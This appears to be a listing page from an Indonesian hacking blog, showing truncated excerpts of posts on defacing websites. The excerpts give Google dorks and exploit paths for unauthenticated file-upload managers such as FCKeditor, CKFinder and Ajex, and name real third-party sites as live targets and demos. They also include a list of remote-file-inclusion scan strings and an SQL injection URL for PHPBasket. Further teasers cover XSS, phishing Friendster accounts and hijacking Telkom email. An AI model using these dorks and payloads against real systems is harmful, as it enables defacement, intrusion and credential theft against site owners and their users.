[POC] Vulnerability Simplicity Of Upload
Assalamualaikum sahabat BinusHacker Sudah lama gak posting di sini, kali ini masih seputar DEFACE WEBSITE aja lah hehe. Sesuai judul di atas, mari kita bahas bersama aja Simplycity Of Upload, terdengar sangat hebat bukan ? haha. Mendapatkan ini selal tidak sengaja, karena saya hanya memakai dork yang lumanyun. #Step 1: Dork: “Powered By: © Simplicity [...]
PHP File Manager Vulnerability
Assalamualaikum Sahabat binus Bertemu saya lagi Fikri a.k.a BadBoy hehe. Saya tidak pernah bosan untuk memberikan materi terhadap kalian. Apa lagi seputar deface Okay langsung saja tanpa membuang waktu. Dork: intitle:File Manager inurl:”fm.php” *Gunain dork yg lain utk mndaptkan bnyk target. Exploit: - http://[localhost]/Patch/fm.php Video: - Download Video Deface *video itu saya upload dr [...]
Vuln Plugins TinyMCE Insert File
Assalamualaikum Apa kabar sahabat Binus ? saya harap Alhamdulillah ya baik hehe. Okay dengan saya lagi, saya ingin memberi beberapa Exploit yang menarik untuk di jadikan pembelajaran Deface. Langsung saja kita bahas bersama. Dork: - inurl:filemanager/insertFile/ *Use Your Head for many target _____________________________________________ / \ | author: BadBoy | | E-mail: fikri-badboy@asia-mail.com | | copyright: [...]
Cara Deface Melalui CKFinder
Assalamualaikum Yuhuu, masih bersama saya lagi nih hehe. Kalo sama saya, pasti bahas tentang deface lagi Yapz, kali ini main exploit lagi aja ya. Okay mari kita bahas bersama Dork: - intitle:index of? inurl:CKfinder/ckfinder.html Pilih target sesuka kamu. Nanti ada gambar seperti di bawah ini Setelah itu ? upload deh file kamu. Tapi ekstensi ny [...]
Deface Web Wen.su [Duplicated Wen.ru]
Assalamualaikum Hai ,apa kabar nya ? Hehe saya mau nulis lagi nih. Okay masih seputar DEFACE, karena tidak ada bosan nya membahas yang satu ini Untuk mempersingkat ? Mari kita bahas bersama. Dork: - inurl: upload.html site:wen.su or Think it Live target: - http://defcell21.wen.su/upload.html - http://madiun.wen.su/upload/index.html Okay, for preview your file ? http://[localhost]/pach/your file. Cara [...]
Ajex File Manager [Deface Or Shell Upload]
Assalamualaikum Hallo sahabat Binus Hacker ? apa kabar nya ? Okay pertemuan dengan saya kali ini akan memahas tentang hacking lagi Yapz seputar deface. Tak mau lama menunggu ? mari kita bahas ya bersama. Google Dork: - intitle: Ajex.FileManager - inurl: /plugins/editors/AjexFileManager/ *Think it again Exploit: - http://[localhost]/patch/plugins/editors/ajexfilemanager/index.html Preview: You can see if succses [...]
SQLi Dork, RFI Dork & LFI Dork
19 June 2011
Penulis: BinusHacker · Kategori Artikel: Vuln
Berikut ini adalah kumpulan SQLi Dork, SQL Injection Dork, RFI Dork, LFI Dork, Google Dork, SQL Dork, Dork SQL, Dork RFI, Dork LFI, Dork File Upload, Dork Upload, Dork SQLi, Vuln Dork, Deface Dork, Hacker Dork, Dork Hacker, Dork Cracker, Crack Dork, Cracker Dork, CSRF Dork, Exploit Dork, Remote File Dork, Inclusion Dork, Local File [...]
XSS HTML On Friendster.Com
Sesuai dengan namanya Cross Site Scripting yang berasal dari kata “Cross” berarti silang / menyilang, “Site” berarti tempat(halaman website), “Scripting” berarti pengkodean / penulisan kode. Dari sini kita dapat mendefinisikan bahwa Cross Site Scripting atau yang lebih dikenal dengan XSS berarti penyilangan suatu kode pada halaman website. XSS bisa juga diartikan penulisan kode pada sebuah [...]
FCKEditor Vulnerability
Author : KaCaK HomePage : http://www.griadamlar.com Web App.Name : MEFE EMLAK SCRIPT Price : N/A Version : N/A Software: http://emlak.mefe.net/ Vulnerability Style : File Upload Bug : File Upload Google Keyword : inurl:advert_detail.php?id= Demos : http://www.emlax.de/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php http://www.dogoturizm.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php http://www.atlantagrup.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php Explotation|(FCKeditor) Artibary File Upload : http://$Site/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php File Uploaded Link : http://$site/$path/files http://$site/files Live Preview : http://www.emlax.de/files/binushacker/binushacker.html Setelah [...]
Blue Screen Error Message
25 February 2010
Penulis: BinusHacker · Kategori Artikel: Vuln
Pesan kesalahan / eror messages biasa berisi suatu kesalahan pada operating system atau hardware. Troubleshooting berisikan anjuran atau saran-saran apa yang harus dilakukan untuk memperbaiki kesalahan. Letaknya berada di bawah pesan error. Kode-kode hexadesimal yang menuliskan kode-kode crash. Memory Dump Message: mengindikasikan bahwa semua proses yang saat itu sedang berlangsung di memory disalin ke dalam [...]
Bug Dork Vulnerability Scanner
28 June 2009
Penulis: BinusHacker · Kategori Artikel: Vuln
!scan /ws/login.php?includedir= WebCalendar !scan /ws/login.php?includedir= WebCalendar v0.9.45 !scan ocp-103/index.php?req_path= ocPortal !scan images/evil.php?owned= e107 !scan index.php?module=PostWrap&page= PostNuke PostWrap !scan mcNews/admin/header.php?skinfile= mcNews !scan inc/download_center_lite.inc.php?script_root= “Download Center Lite” !scan zboard/zboard.php?id= Zeroboard !scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez !scan include/SQuery/gameSpy2.php?libpath= intitle:”Autonomous LAN party” !scan event.php?myevent_path= MyEvent !scan index.php?page= “Internet PhotoShow” !scan mod/authent.php4?rootpath= RechnungsZentrale !scan about.php?DFORUM_PATH= dForum !scan post.php?DFORUM_PATH= dForum !scan movie_cls.php?full_path= Built2Go [...]
Hacking Email Telkom.net dan Plasa.com
Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi [...]
Security KlikBCA – Recover Password With XSS
Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut. Maaf artikel ini bukan XSS basics, tentang apa itu XSS [...]
PHP Basket Vulnerability
1 February 2009
Penulis: BinusHacker · Kategori Artikel: Vuln
[o] PHPBasket 4.0 SQL Injection Vulnerability Software : PHPBasket version 4.0 Vendor : http://www.phpbasket.com/ Author : NoGe [o] Vulnerable file product.php [o] Exploit http://localhost/[path]/product.php?cat_id=[sql] [o] Dork "Powered by PHPBasket" 12345678910111213141516 [o] PHPBasket 4.0 SQL Injection Vulnerability Software : PHPBasket version 4.0 Vendor : http://www.phpbasket.com/ Author : NoGe [o] Vulnerable file product.php [o] Exploit http://localhost/[path]/product.php?cat_id=[sql] [o] [...]
Phising – Hack Friendster
Hasil capture FS orang lain hehehe FS siapa yah ? mohon maaf kalo yg punya lihat, tolong diganti passwordnya Dalam komputer, istilah bahasa Inggris phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi sensitif, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik [...]
